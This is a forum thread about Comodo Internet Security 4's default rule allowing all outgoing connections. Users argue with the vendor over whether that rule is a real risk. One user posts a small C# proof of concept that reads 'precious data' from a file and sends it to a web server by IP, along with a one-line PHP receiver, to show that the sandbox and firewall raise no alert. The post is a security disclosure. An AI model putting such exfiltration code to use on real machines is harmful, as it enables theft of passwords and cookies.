Allow all outgoing connexions is dangerous

To answer to;msg392877#msg392877

Your informations can be easily steal with CIS 4 in Internet Security configuration.

I just try to make a little application, it read a file on C:\program files\Myapps and send data to a http server.
It’s sandboxing, but it’s all CIS 4 do.

No alert from the firewall because of this stupid rule that allow all outgoing connexions.

I have just one D+ alert, yes, because i need DNS for my server… But I just need to connect to a ip and i won’t have another alert expect it was sandboxed.

I take a stupid file, but imagine I upload Firefox directory for example, all cookies, saved password, history …

Agreed, leave the default settings the same as they are now but remove the allow all connections rule.

This is very dangerous. I’m not sure why it was included to begin with. :-\ I actually receive very few alerts from the firewall anyway.

I know, I already delete it from all CIS 4 i install, and i advise to do the same in the French corner. But all users don’t read this forum … And It’s the default configuration …

Many users mentioned this in previous posts but people in Comodo seems not listening.

How many alerts do you need?

Also Egemen did make a post around 5th march about this issue. its an old issue…

Show us a malware in the wild bypassing, we will be more than grateful for the knowledge and we will improve asap.


Did you read what I said ? I just have to use an ip and not a domain and I won’t have any alert from D+ because it won’t use DNS and defense+ won’t react to this.
But I don’t own a server with my own ip. Or must I create i special network at home to show you it ?

again, pls show us an in the wild malware that bypasses CIS we will fix it immediately.


So, i change a little the application, and I made a server with wamp on an another computer connected on a special network to be sure it’s not on y local network.

My network is in and the server on

I try to steal a password from an application that store it into a file named mypreciousdata.dat in c:\program files\Myapps

here the code of the application in c#

using System; using System.IO; using System.Net; using System.Windows.Forms;

namespace WindowsFormsApplication1
static class Program

/// Point d’entrée principal de l’application.

static void Main()
StreamReader monStreamReader = new StreamReader(“c:/Program Files/Myapps/mypreciousdata.dat”);
string data = monStreamReader.ReadLine();
string result = “”;

        MessageBox.Show("your precious data is : " + data);

        WebClient client = new WebClient();
        result = client.DownloadString("" + data);

        MessageBox.Show("Answer from website : " + result);


Code of php server

My steal data : <?php echo $_GET['data'] ?>

Here we go, I execute my application, CIS sandbox it (see test1.jpg)

And then, data is sent … php server answered me … (see test2.jpg)

No D+ alert, no Firewall alert …

[attachment deleted by admin]

Let me ask you politely - Are you okay? 88) I mean, what kind of logic is this, huh? You talk and talk and talk about prevention, but now when we ask for PREVENTION for possible exploit(s) you give these lame excuses?

Why do you add Sandbox then? FOR PREVENTION! You have said many times that D+ is almost bullet proof and no malware in the wild can bypass it, but you still added Sandbox for PREVENTION!

We are protecting users from real threats!

If there is a real threat, pls give us the malware, so that we can fix.


So must we create a real malware that steal real informations to make you understand we are right ?

Or are you saying that you (or Comodo) don’t want remove that stupid rule in any condition ?

Sometimes Melih’s logic just baffles me and leaves me speechless 88) And arguing with him is like arguing with 5 year old who wants to go to Chuck E. Cheese.

What i am saying is: there is a risk v reward ratio, There is no 100% security, and no security vendor try to close every theoritical hole. Which means the focus has to be what really matters, which is real malware out there. No point in disturbing the user for a theoritical protection.

hope this clarifies


Even if it’s a 1 second fix and everyone’s happy? 88) Just awesome!


Yep, get on it. ;D

In all seriousness though if these “theoretical security holes” can be properly simulated by users then they can also be used when creating malware.

From what I can tell Shaoran’s program, if it works the way it appears to, is an example of the dangers of the “allow all” rule.

I’m not sure how you can rule it out without properly investigating the code and its implementation.

So why use this kind of rule ? It’s the only error here because the application won’t do anything to the system., that why D+ don’t see anything. It’s just about take an information and that all.

You made the rule because you think that it will be better for novice users, but what use novice users ? All applications that lot of people use and so, without any alert because they are already in your safe list.

So really, why put this rule whereas it can be a security hole in certain conditions ?

I think a way around this rule would be to use the white list for the firewall also, if the application is signed and part of the white list it gets access, if not you get asked. I don’t think it would be to hard to implement and that way you will have security and ease of use.

It’s already done. Use proactivity configuration for example.

You’re talking about firewall’s Safe Mode which is present in CIS since its beginning.

I personally have a problem with the way the new firewall policy is implemented rather than there exists such thing like allow all outgoing connections mode in CIS. By adding these weird policy to Application Rules in Network Security Policy, Comodo practically rendered Firewall Security Level setting completely useless. IMHO, here is how it should be done…

[attachment deleted by admin]

these possibilities exist IF you can infect the PC in the first place.
So what is being talked about here is NOT even how to infect the PC…
it is IF they managed to infect the pc, this is how they can extract information.

hope this clarifies…